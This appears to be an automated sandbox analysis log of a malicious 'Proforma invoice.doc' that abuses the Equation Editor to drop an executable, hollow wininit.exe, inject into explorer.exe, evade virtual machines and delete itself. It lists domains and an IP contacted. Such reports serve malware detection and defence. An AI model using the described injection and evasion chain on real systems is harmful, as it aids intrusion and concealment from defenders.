          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0249FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_024A0048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_024A0060 NtQuerySection,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_024A0078 NtResumeThread,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_024A10D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_024A1148 NtOpenThread,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_024A010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_024A01D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0249FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0249FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0249FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0249F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0249F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_024A1930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0249FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0249FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0249FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0249FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0249FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_024A0C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0249FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0249FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0249FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0249FD8C NtDelayExecution,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_024A1D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000FA350 NtCreateFile,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000FA400 NtReadFile,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000FA480 NtClose,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000FA530 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000FA34A NtCreateFile,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000FA3A3 NtReadFile,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000FA47A NtClose,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000FA52B NtAllocateVirtualMemory,
          Source: ibefrankzx[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: ibefrankhq4862.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeMemory allocated: 76E90000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeMemory allocated: 76E90000 page execute and read and write
          Source: C:\Windows\SysWOW64\wininit.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Windows\SysWOW64\wininit.exeMemory allocated: 76E90000 page execute and read and write
          Source: Proforma invoice.docReversingLabs: Detection: 26%
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe C:\Users\user\AppData\Roaming\ibefrankhq4862.exe
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeProcess created: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe C:\Users\user\AppData\Roaming\ibefrankhq4862.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wininit.exe C:\Windows\SysWOW64\wininit.exe
          Source: C:\Windows\SysWOW64\wininit.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\ibefrankhq4862.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe C:\Users\user\AppData\Roaming\ibefrankhq4862.exe
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeProcess created: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe C:\Users\user\AppData\Roaming\ibefrankhq4862.exe
          Source: C:\Windows\SysWOW64\wininit.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\ibefrankhq4862.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$oforma invoice.docJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD24B.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@9/8@5/2
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: explorer.exe, 00000006.00000000.416645751.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wininit.pdb source: ibefrankhq4862.exe, 00000005.00000002.448740423.0000000000484000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdb source: ibefrankhq4862.exe, wininit.exe

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: ibefrankzx[1].exe.2.dr, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: ibefrankhq4862.exe.2.dr, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.ibefrankhq4862.exe.13a0000.0.unpack, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.2.ibefrankhq4862.exe.13a0000.2.unpack, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.ibefrankhq4862.exe.13a0000.0.unpack, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.2.ibefrankhq4862.exe.13a0000.5.unpack, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0040E3CE push esi; iretd
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_00417C03 push edi; iretd
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0040E419 push ds; ret
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0041D4F2 push eax; ret
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0041D4FB push eax; ret
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_00417C80 push edi; iretd
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0041D4A5 push eax; ret
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0041D55C push eax; ret
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_024ADFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000EE3CE push esi; iretd
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000EE419 push ds; ret
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000FD4A5 push eax; ret
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000FD4FB push eax; ret
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000FD4F2 push eax; ret
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000FD55C push eax; ret
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000FD7C1 pushfd ; iretd
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000F7C03 push edi; iretd
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000F7C80 push edi; iretd
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000FDD5E push eax; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.04325438005
          Source: initial sampleStatic PE information: section name: .text entropy: 7.04325438005
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ibefrankzx[1].exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xE8
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wininit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 4.2.ibefrankhq4862.exe.28bed1c.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.412503332.0000000002881000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: ibefrankhq4862.exe PID: 2032, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: ibefrankhq4862.exe, 00000004.00000002.412503332.0000000002881000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: ibefrankhq4862.exe, 00000004.00000002.412503332.0000000002881000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeRDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wininit.exeRDTSC instruction interceptor: First address: 00000000000E9904 second address: 00000000000E990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wininit.exeRDTSC instruction interceptor: First address: 00000000000E9B6E second address: 00000000000E9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2632Thread sleep time: -240000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe TID: 2752Thread sleep time: -37527s >= -30000s
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe TID: 2692Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 2852Thread sleep time: -34000s >= -30000s
          Source: C:\Windows\SysWOW64\wininit.exe TID: 2184Thread sleep time: -44000s >= -30000s
          Source: C:\Windows\SysWOW64\wininit.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wininit.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_00409AA0 rdtsc
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeThread delayed: delay time: 37527
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000006.00000000.418732343.000000000457A000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000006.00000000.489109171.0000000000255000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: ibefrankhq4862.exe, 00000004.00000002.412503332.0000000002881000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: ibefrankhq4862.exe, 00000004.00000002.412503332.0000000002881000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000006.00000000.418732343.000000000457A000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 00000006.00000000.418716458.000000000456F000.00000004.00000001.sdmpBinary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
          Source: explorer.exe, 00000006.00000000.437383575.00000000044E7000.00000004.00000001.sdmpBinary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
          Source: explorer.exe, 00000006.00000000.413102418.000000000029B000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
          Source: explorer.exe, 00000006.00000000.418800523.00000000045D6000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: ibefrankhq4862.exe, 00000004.00000002.412503332.0000000002881000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: ibefrankhq4862.exe, 00000004.00000002.412503332.0000000002881000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_00409AA0 rdtsc
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\wininit.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_008726F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_024B26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\wininit.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0040ACE0 LdrLoadDll,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.urbantennis.info
          Source: C:\Windows\explorer.exeNetwork Connect: 34.98.99.30 80
          Source: C:\Windows\explorer.exeDomain query: www.lazyguysmarketing.com
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeSection unmapped: C:\Windows\SysWOW64\wininit.exe base address: 5B0000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeSection loaded: unknown target: C:\Windows\SysWOW64\wininit.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeSection loaded: unknown target: C:\Windows\SysWOW64\wininit.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wininit.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wininit.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeMemory written: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeThread register set: target process: 1764
          Source: C:\Windows\SysWOW64\wininit.exeThread register set: target process: 1764
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe C:\Users\user\AppData\Roaming\ibefrankhq4862.exe
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeProcess created: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe C:\Users\user\AppData\Roaming\ibefrankhq4862.exe
          Source: C:\Windows\SysWOW64\wininit.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\ibefrankhq4862.exe'
          Source: explorer.exe, 00000006.00000000.489292845.0000000000750000.00000002.00020000.sdmp, wininit.exe, 00000007.00000002.668793907.0000000000B00000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.489109171.0000000000255000.00000004.00000020.sdmpBinary or memory string: ProgmanG
          Source: explorer.exe, 00000006.00000000.489292845.0000000000750000.00000002.00020000.sdmp, wininit.exe, 00000007.00000002.668793907.0000000000B00000.00000002.00020000.sdmpBinary or memory string: !Progman
          Source: explorer.exe, 00000006.00000000.489292845.0000000000750000.00000002.00020000.sdmp, wininit.exe, 00000007.00000002.668793907.0000000000B00000.00000002.00020000.sdmpBinary or memory string: Program Manager<
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeQueries volume information: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe VolumeInformation
